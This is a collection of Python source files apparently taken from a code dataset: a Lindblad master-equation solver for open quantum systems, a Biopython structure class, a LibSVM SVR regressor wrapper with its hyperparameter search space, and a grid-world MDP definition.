s0, sx, sy, sz = pauli()
nstates = 2
H = np.diagflat([0, 1])/au2ev + 0.5/au2ev*sx
#h = np.diagflat(np.arange(10))
dip = np.zeros(H.shape)
dip[0,:] = dip[:,0] = np.random.rand(nstates)
c_op = dip
gamma = 0.05
# l = h.to_super() + 1j * c_op.to_linblad(gamma=gamma)
# l = liouvillian(H, c_ops=[gamma*c_op])
# ntrans = 3 * nstates # number of transitions
# eigvals1, U1 = eigs(l, k=ntrans, which='LR')
# eigvals1, U1 = sort(eigvals1, U1)
# print(eigvals1.real)
# omegas = np.linspace(0.1 , 10.5, 200)
from lime.phys import ket2dm
from lime.style import matplot, subplots
rho0 = ket2dm(np.array([1.0, 0.0]))
# rho0.data[0,0] = 1.0
ops = [sx, sx]
# out = correlation_2p_1t(omegas, rho0, ops, L)
# print(eigvecs)
# eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
# eigvals2, U2 = sort(eigvals2, U2)
# #idx = np.where(eigvals2.real > 0.2)[0]
# #print(idx)
# norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
# la = np.zeros(len(omegas), dtype=complex) # linear absorption
# for j, omega in enumerate(omegas):
# for n in range(ntrans):
# la[j] += np.vdot(operator_to_vector(dip), U1[:,n]) * \
# np.vdot(U2[:,n], operator_to_vector(dip.dot(rho0))) \
# /(omega - eigvals1[n]) / norm[n]
# fig, ax = plt.subplots()
# # ax.scatter(eigvals1.real, eigvals1.imag)
# ax.plot(omegas, -2 * la.imag)
# plt.show()
solver = Lindblad_solver(H, c_ops=[0.02*sx])
# solver.liouvillian()
solver.eigenstates()
# print(solver.right_eigvecs)
times = np.linspace(0, 40)/au2fs
result = solver.evolve(rho0, tlist=times, e_ops=[sx, sz])
# cor = solver.correlation_2op_1t(rho0=rho0, ops=[sx, sx], tlist=times)
w = np.linspace(0.4, 2., 100)/au2ev
S = solver.correlation_3op_1w(rho0=rho0, ops=[sx, sx, sx], w=w)
fig, ax = subplots()
ax.plot(w * au2ev, S.real)
# print(cor)
# fig, ax = matplot(times, times, cor.real)
# cor = solver.correlation_3op_2t(ops=[sx, sx, sz], taulist=times, tlist=times, rho0=rho0, k=4)
# fig, ax = subplots()
# # # ax.scatter(eigvals1.real, eigvals1.imag)
# ax.plot(result.times, result.observables[:,1])
# plt.show()
# from lime.style import matplot
# fig, ax = matplot(times, times, cor.real)
| 22.497701
| 99
| 0.535278
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import kron, identity, issparse
from scipy.sparse.linalg import eigs
import scipy
import math
from numba import jit
from numpy import exp
from lime.phys import dag, pauli
from lime.mol import Result
def liouvillian(H, c_ops):
if c_ops is None:
c_ops = []
l = -1j * operator_to_superoperator(H)
for c_op in c_ops:
l = l + lindblad_dissipator(c_op)
return l
class Qobj():
def __init__(self, data=None, dims=None):
self.dims = dims
self.data = data
if data is None:
self.data = np.random.randn(*dims)
self.shape = self.data.shape
return
def dot(self, b):
return Qobj(np.dot(self.data, b.data))
def conjugate(self):
return np.conjugate(self.data)
def to_vector(self):
return operator_to_vector(self.data)
    def to_super(self, kind='commutator'):
        return operator_to_superoperator(self.data, kind=kind)
    def to_linblad(self, gamma=1.):
        l = self.data
        return gamma * (kron(l, l.conj()) - 0.5 *
               operator_to_superoperator(dag(l).dot(l), kind='anticommutator'))
def liouville_space(N):
return
def operator_to_vector(rho):
if isinstance(rho, np.ndarray):
return rho.flatten()
else:
return rho.toarray().flatten()
def dm2vec(rho):
if issparse(rho):
n, m = rho.shape
return rho.tolil().reshape((n*m, 1))
else:
return rho.flatten()
def op2sop(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def to_super(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def vec2mat_index(N, I):
j = int(I / N)
i = I - N * j
return i, j
def mat2vec_index(N, i, j):
return i + N * j
def operator_to_superoperator(a, kind='commutator'):
N = a.shape[-1]
idm = identity(N)
if kind in ['commutator', 'c', '-']:
return kron(a, idm) - kron(idm, a.T)
elif kind in ['left', 'l']:
return kron(a, idm)
elif kind in ['right', 'r']:
return kron(idm, a.T)
elif kind in ['anticommutator', 'a', '+']:
return kron(a, idm) + kron(idm, a.T)
else:
raise ValueError('Error: superoperator {} does not exist.'.format(kind))
def lindblad_dissipator(l):
return kron(l, l.conj()) - 0.5 *\
operator_to_superoperator(dag(l).dot(l), kind='anticommutator')
def left(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(a, idm)
def right(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(idm, a.T)
def kraus(a):
al = left(a)
ar = right(dag(a))
return ar.dot(al)
def obs(rho, a):
return np.vdot(operator_to_vector(dag(a)), rho)
def trace(rho):
n = math.isqrt(len(rho))
return np.vdot(operator_to_vector(np.identity(n)), rho)
def resolvent(omega, L):
idm = np.identity(L.shape[0])
return np.linalg.inv(omega * idm - L)
def _correlation_2p_1f(omegas, rho0, ops, L):
a, b = ops
out = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
out[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return out
def _correlation_2p_1t(omegas, rho0, ops, L):
a, b = ops
cor = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
cor[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return cor
def sort(eigvals, eigvecs):
idx = np.argsort(eigvals)
eigvals = eigvals[idx]
eigvecs = eigvecs[:,idx]
return eigvals, eigvecs
def cdot(a, b):
return dag(a) @ b
def absorption(mol, omegas, c_ops):
gamma = 0.02
l = op2sop(H) + 1j * c_op.to_linblad(gamma=gamma)
ntrans = 3 * nstates
eigvals1, U1 = eigs(l, k=ntrans, which='LR')
eigvals1, U1 = sort(eigvals1, U1)
omegas = np.linspace(0.1 , 10.5, 200)
rho0 = Qobj(dims=[10,10])
rho0.data[0,0] = 1.0
ops = [sz, sz]
eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
eigvals2, U2 = sort(eigvals2, U2)
norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
la = np.zeros(len(omegas), dtype=complex)
for j, omega in enumerate(omegas):
for n in range(ntrans):
la[j] += np.vdot(dip.to_vector(), U1[:,n]) * \
np.vdot(U2[:,n], dip.dot(rho0).to_vector()) \
/(omega - eigvals1[n]) / norm[n]
fig, ax = plt.subplots()
ax.plot(omegas, -2 * la.imag)
return
class Lindblad_solver:
def __init__(self, H, c_ops=None):
self.H = H
self.c_ops = c_ops
self.L = None
self.dim = H.shape[-1]**2
self.idv = operator_to_vector(np.identity(H.shape[-1]))
self.left_eigvecs = None
self.right_eigvecs = None
self.eigvals = None
self.norm = None
    def liouvillian(self):
        L = liouvillian(self.H, self.c_ops)
self.L = L
return L
def eigenstates(self, k=None):
if self.L is None:
L = self.liouvillian()
else:
L = self.L
N = L.shape[-1]
if k is None:
w, vl, vr = scipy.linalg.eig(L.toarray(), left=True, \
right=True)
self.eigvals = w
self.left_eigvecs = vl
self.right_eigvecs = vr
self.norm = np.diagonal(cdot(vl, vr)).real
elif k < N-1:
evals1, U1 = eigs(L, k=k, which='LR')
evals1, U1 = sort(evals1, U1)
evals2, U2 = eigs(dag(L), k=k, which='LR')
evals2, U2 = sort(evals2, U2)
else:
raise ValueError('k should be < the size of the matrix.')
return w, vr, vl
def evolve(self, rho0, tlist, e_ops):
result = Result(times=tlist)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
norm = self.norm
rho0 = operator_to_vector(rho0)
k = U1.shape[-1]
observables = np.zeros((len(tlist), len(e_ops)), dtype=complex)
coeff = [np.vdot(U2[:,n], rho0)/norm[n] for n in range(k)]
for i, t in enumerate(tlist):
rho = U1.dot(coeff * exp(evals * t))
observables[i, :] = [obs(rho, e_op) for e_op in e_ops]
result.observables = observables
return result
def correlation_2op_1t(self, rho0, ops, tlist):
a, b = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(tlist), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i, t in enumerate(tlist):
cor[i] = np.sum(exp(evals * t) * coeff)
return cor
def correlation_2op_1w(self, rho0, ops, w):
a, b = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = len(evals)
norm = self.norm
idv = self.idv
S = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i in range(len(w)):
S[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return S
def correlation_3op_1t(self, rho0, ops, t):
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(t), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(t)):
cor[i] = np.sum( exp(evals * t[i]) * coeff)
return cor
def correlation_3op_1w(self, rho0, ops, w):
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(w)):
cor[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return cor
def correlation_3op_2t(self, rho0, ops, tlist, taulist, k=None):
a, b, c = ops
rho0 = operator_to_vector(rho0)
cor = np.zeros((len(tlist), len(taulist)), dtype=complex)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
if k is None:
k = self.dim
norm = self.norm
idv = self.idv
coeff = np.zeros((k,k), dtype=complex)
for m in range(k):
for n in range(k):
coeff[m, n] = np.vdot(idv, left(b).dot(U1[:, m])) * \
np.vdot(U2[:,m], right(a).dot(left(c).dot(U1[:,n])))/norm[m]\
* np.vdot(U2[:, n], rho0)/norm[n]
tmp1 = exp(np.outer(evals, taulist))
tmp2 = exp(np.outer(evals, tlist))
cor = tmp1.T @ coeff @ tmp2
return cor
def correlation_4op_2t(self, rho0, ops, tlist, taulist, k=None):
if len(ops) != 4:
raise ValueError('Number of operators is not 4.')
else:
a, b, c, d = ops
corr = self.correlation_3op_2t(rho0=rho0, ops=[a, b@c, d], tlist=tlist, \
taulist=taulist, k=k)
return corr
if __name__ == '__main__':
from lime.units import au2fs, au2ev
s0, sx, sy, sz = pauli()
nstates = 2
H = np.diagflat([0, 1])/au2ev + 0.5/au2ev*sx
dip = np.zeros(H.shape)
dip[0,:] = dip[:,0] = np.random.rand(nstates)
c_op = dip
gamma = 0.05
from lime.phys import ket2dm
from lime.style import matplot, subplots
rho0 = ket2dm(np.array([1.0, 0.0]))
ops = [sx, sx]
    solver = Lindblad_solver(H, c_ops=[0.02*sx])
solver.eigenstates()
times = np.linspace(0, 40)/au2fs
result = solver.evolve(rho0, tlist=times, e_ops=[sx, sz])
w = np.linspace(0.4, 2., 100)/au2ev
S = solver.correlation_3op_1w(rho0=rho0, ops=[sx, sx, sx], w=w)
fig, ax = subplots()
ax.plot(w * au2ev, S.real)
| true
| true
|
1c40fce82fec6b6c713a51aa37d5189ac454d3f6
| 1,379
|
py
|
Python
|
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""The structure class, representing a macromolecular structure."""
from .Entity import Entity
class Structure(Entity):
"""
The Structure class contains a collection of Model instances.
"""
def __init__(self, id):
self.level="S"
Entity.__init__(self, id)
# Special methods
def __repr__(self):
return "<Structure id=%s>" % self.get_id()
# Private methods
def _sort(self, m1, m2):
"""Sort models.
This sorting function sorts the Model instances in the Structure instance.
The sorting is done based on the model id, which is a simple int that
reflects the order of the models in the PDB file.
Arguments:
o m1, m2 - Model instances
"""
return cmp(m1.get_id(), m2.get_id())
# Public
def get_chains(self):
for m in self:
for c in m:
yield c
def get_residues(self):
for c in self.get_chains():
for r in c:
yield r
def get_atoms(self):
for r in self.get_residues():
for a in r:
yield a
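A short usage sketch with a hypothetical, already-populated structure instance; the three generators stream the Model/Chain/Residue/Atom hierarchy lazily instead of materializing lists.
# structure: a populated Structure instance (hypothetical)
for atom in structure.get_atoms():
    print(atom)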
| 24.625
| 82
| 0.59826
|
from .Entity import Entity
class Structure(Entity):
def __init__(self, id):
self.level="S"
Entity.__init__(self, id)
def __repr__(self):
return "<Structure id=%s>" % self.get_id()
def _sort(self, m1, m2):
return cmp(m1.get_id(), m2.get_id())
def get_chains(self):
for m in self:
for c in m:
yield c
def get_residues(self):
for c in self.get_chains():
for r in c:
yield r
def get_atoms(self):
for r in self.get_residues():
for a in r:
yield a
| true
| true
|
1c40fdf35faba0891f2a51223186847b12b1ad98
| 4,348
|
py
|
Python
|
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | 1
|
2021-09-06T20:21:15.000Z
|
2021-09-06T20:21:15.000Z
|
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | null | null | null |
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | null | null | null |
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.conditions import EqualsCondition, InCondition
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter
from alphaml.utils.constants import *
from alphaml.utils.model_util import softmax
from alphaml.utils.common import check_none, check_for_bool
from alphaml.engine.components.models.base_model import BaseRegressionModel
class LibSVM_SVR(BaseRegressionModel):
def __init__(self, C, kernel, gamma, shrinking, tol, max_iter,
degree=3, coef0=0, random_state=None):
self.C = C
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.shrinking = shrinking
self.tol = tol
self.max_iter = max_iter
self.random_state = random_state
self.estimator = None
def fit(self, X, Y):
from sklearn.svm import SVR
self.C = float(self.C)
if self.degree is None:
self.degree = 3
else:
self.degree = int(self.degree)
if self.gamma is None:
self.gamma = 0.0
else:
self.gamma = float(self.gamma)
if self.coef0 is None:
self.coef0 = 0.0
else:
self.coef0 = float(self.coef0)
self.tol = float(self.tol)
self.max_iter = float(self.max_iter)
self.shrinking = check_for_bool(self.shrinking)
self.estimator = SVR(C=self.C,
kernel=self.kernel,
degree=self.degree,
gamma=self.gamma,
coef0=self.coef0,
shrinking=self.shrinking,
tol=self.tol,
max_iter=self.max_iter)
self.estimator.fit(X, Y)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'LibSVM-SVR',
'name': 'LibSVM Support Vector Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
C = UniformFloatHyperparameter("C", 0.03125, 32768, log=True,
default_value=1.0)
# No linear kernel here, because we have liblinear
kernel = CategoricalHyperparameter(name="kernel",
choices=["rbf", "poly", "sigmoid"],
default_value="rbf")
degree = UniformIntegerHyperparameter("degree", 2, 5, default_value=3)
gamma = UniformFloatHyperparameter("gamma", 3.0517578125e-05, 8,
log=True, default_value=0.1)
# TODO this is totally ad-hoc
coef0 = UniformFloatHyperparameter("coef0", -1, 1, default_value=0)
# probability is no hyperparameter, but an argument to the SVM algo
shrinking = CategoricalHyperparameter("shrinking", ["True", "False"],
default_value="True")
tol = UniformFloatHyperparameter("tol", 1e-5, 1e-1, default_value=1e-3,
log=True)
# cache size is not a hyperparameter, but an argument to the program!
max_iter = UnParametrizedHyperparameter("max_iter", 2000)
cs = ConfigurationSpace()
cs.add_hyperparameters([C, kernel, degree, gamma, coef0, shrinking,
tol, max_iter])
degree_depends_on_poly = EqualsCondition(degree, kernel, "poly")
coef0_condition = InCondition(coef0, kernel, ["poly", "sigmoid"])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
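A brief usage sketch under stated assumptions: sample_configuration() and Configuration.get_dictionary() are standard ConfigSpace calls, and X_train/y_train are placeholders for user-supplied data.
cs = LibSVM_SVR.get_hyperparameter_search_space()
config = cs.sample_configuration()             # one random point in the space
model = LibSVM_SVR(**config.get_dictionary())  # inactive conditionals fall back to defaults
model.fit(X_train, y_train)                    # X_train, y_train: placeholder data
print(model.predict(X_train))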
| 41.018868
| 79
| 0.583947
|
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.conditions import EqualsCondition, InCondition
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter
from alphaml.utils.constants import *
from alphaml.utils.model_util import softmax
from alphaml.utils.common import check_none, check_for_bool
from alphaml.engine.components.models.base_model import BaseRegressionModel
class LibSVM_SVR(BaseRegressionModel):
def __init__(self, C, kernel, gamma, shrinking, tol, max_iter,
degree=3, coef0=0, random_state=None):
self.C = C
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.shrinking = shrinking
self.tol = tol
self.max_iter = max_iter
self.random_state = random_state
self.estimator = None
def fit(self, X, Y):
from sklearn.svm import SVR
self.C = float(self.C)
if self.degree is None:
self.degree = 3
else:
self.degree = int(self.degree)
if self.gamma is None:
self.gamma = 0.0
else:
self.gamma = float(self.gamma)
if self.coef0 is None:
self.coef0 = 0.0
else:
self.coef0 = float(self.coef0)
self.tol = float(self.tol)
self.max_iter = float(self.max_iter)
self.shrinking = check_for_bool(self.shrinking)
self.estimator = SVR(C=self.C,
kernel=self.kernel,
degree=self.degree,
gamma=self.gamma,
coef0=self.coef0,
shrinking=self.shrinking,
tol=self.tol,
max_iter=self.max_iter)
self.estimator.fit(X, Y)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'LibSVM-SVR',
'name': 'LibSVM Support Vector Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
C = UniformFloatHyperparameter("C", 0.03125, 32768, log=True,
default_value=1.0)
kernel = CategoricalHyperparameter(name="kernel",
choices=["rbf", "poly", "sigmoid"],
default_value="rbf")
degree = UniformIntegerHyperparameter("degree", 2, 5, default_value=3)
gamma = UniformFloatHyperparameter("gamma", 3.0517578125e-05, 8,
log=True, default_value=0.1)
coef0 = UniformFloatHyperparameter("coef0", -1, 1, default_value=0)
shrinking = CategoricalHyperparameter("shrinking", ["True", "False"],
default_value="True")
tol = UniformFloatHyperparameter("tol", 1e-5, 1e-1, default_value=1e-3,
log=True)
max_iter = UnParametrizedHyperparameter("max_iter", 2000)
cs = ConfigurationSpace()
cs.add_hyperparameters([C, kernel, degree, gamma, coef0, shrinking,
tol, max_iter])
degree_depends_on_poly = EqualsCondition(degree, kernel, "poly")
coef0_condition = InCondition(coef0, kernel, ["poly", "sigmoid"])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
| true
| true
|
1c40febbb24609df26dd7e03553d56d35ba52d03
| 582
|
py
|
Python
|
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
import gin
from colosseum.loops import human_loop
from colosseum.mdps import EpisodicMDP
from colosseum.mdps.simple_grid.simple_grid import SimpleGridMDP, SimpleGridReward
@gin.configurable
class SimpleGridEpisodic(EpisodicMDP, SimpleGridMDP):
pass
if __name__ == "__main__":
mdp = SimpleGridEpisodic(
reward_type=SimpleGridReward.AND,
seed=42,
size=5,
randomize_actions=False,
make_reward_stochastic=True,
lazy=0.01,
number_starting_states=1,
)
# random_loop(mdp, 50, verbose=False)
human_loop(mdp)
| 22.384615
| 82
| 0.714777
|
import gin
from colosseum.loops import human_loop
from colosseum.mdps import EpisodicMDP
from colosseum.mdps.simple_grid.simple_grid import SimpleGridMDP, SimpleGridReward
@gin.configurable
class SimpleGridEpisodic(EpisodicMDP, SimpleGridMDP):
pass
if __name__ == "__main__":
mdp = SimpleGridEpisodic(
reward_type=SimpleGridReward.AND,
seed=42,
size=5,
randomize_actions=False,
make_reward_stochastic=True,
lazy=0.01,
number_starting_states=1,
)
human_loop(mdp)
| true
| true
|